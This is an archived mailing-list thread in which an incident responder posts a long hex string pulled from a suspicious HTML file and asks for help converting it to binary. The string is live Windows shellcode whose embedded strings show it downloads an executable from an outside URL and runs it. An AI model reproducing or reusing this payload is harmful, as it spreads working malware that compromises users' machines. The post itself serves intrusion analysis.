[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[ale] Need a simple perl (etc.) program, but I don't speak perl



Maybe try one of the GPL hex editors here??

http://www.icewalkers.com/search.php?m=exact&q=hex&w=k

peace
aaron

On 2010/06/03, at 10:58 , Greg Freemyer wrote:

> All,
>
> I'm looking at an intrusion and found the attached very suspicious
> html file (I added a .bin extent so it would not be associated with a
> browser etc.
>
> Anyway, within it there is a string  (see below) that I think is the
> hex expression (see below) of malware that I need converted to binary.
> Can someone help me out with a perl script to convert.  Or even
> better, convert it to binary and seal it up in a password protected
> zip file.  Use "infected" as the password.  Thanks, Greg
>
> == Potential malware representation
>
> 505351525657559CE8000000005D83ED0D31C064034030780C8B400C8B701CAD8B4008 
> EB098B40348D407C8B403C5657BE5E01000001EEBF4E01000001EFE8D60100005F5E89 
> EA81C25E010000526880000000FF954E01000089EA81C25E01000031F601C28A9C3563 
> 02000080FB007406881C3246EBEEC604320089EA81C24502000052FF955201000089EA 
> 81C2500200005250FF95560100006A006A0089EA81C25E0100005289EA81C278020000 
> 526A00FFD06A0589EA81C25E01000052FF955A01000089EA81C25E0100005268800000 
> 00FF954E01000089EA81C25E01000031F601C28A9C356E02000080FB007406881C3246EBEEC604320089EA81C24502000052FF955201000089EA81C2500200005250FF95560100006A006A0089EA81C25E0100005289EA81C2A6020000526A00FFD06A0589EA81C25E01000052FF955A0100009D5D5F5E5A595B58C30000000000000000000000000000000047657454656D705061746841004C6F61644C696272617279410047657450726F63416464726573730057696E4578656300BB89F289F730C0AE75FD29F789F931C0BE3C00000003B51B02000066AD03851B0200008B707883C61C03B51B0200008DBD1F020000AD03851B020000ABAD03851B02000050ABAD03851B020000AB5E31DBAD5603851B02000089C689D751FCF3A65974045E43EBE95E93D1E003852702000031F69666ADC1E00203851F02000089C6AD03851B020000C3EB100000000000000000000000000000000089851B0200005657E858FFFFFF5F5EAB01CE803EBB7402EBEDC355524C4D4F4E2E444C4C0055524C446F776E6C6F6164546F46696C6541007064667570642E6578650063726173682E70687000687474703A2F2F767676656E2E696E2F782F6578652E7068703F783D6D696469267372633D626F73732669643D626F6D62610090
>
> ==
> <CF-03763.html.bin>_______________________________________________
> Ale mailing list
> Ale at ale.org
> http://mail.ale.org/mailman/listinfo/ale
> See JOBS, ANNOUNCE and SCHOOLS lists at
> http://mail.ale.org/mailman/listinfo